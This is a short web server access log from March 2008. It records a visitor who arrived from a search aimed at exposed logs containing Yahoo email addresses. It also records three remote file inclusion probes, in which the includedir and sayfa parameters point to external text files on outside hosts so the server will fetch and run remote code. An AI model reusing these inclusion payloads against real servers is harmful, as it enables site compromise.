77.220.0.185 - - [25/Mar/2008:10:14:55 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 1766993 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=%2B202+Index+Ray&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=%40yahoo.com&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=Spam+List&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=text&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=11&dfr%5By%5D=2007&dto%5Bd%5D=25&dto%5Bm%5D=3&dto%5By%5D=2008&hits=10" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.220.0.185 - - [25/Mar/2008:10:15:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:15:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:15:26 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:15:44 -0700] "GET /logs/access_080131.log//index.php?sayfa=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
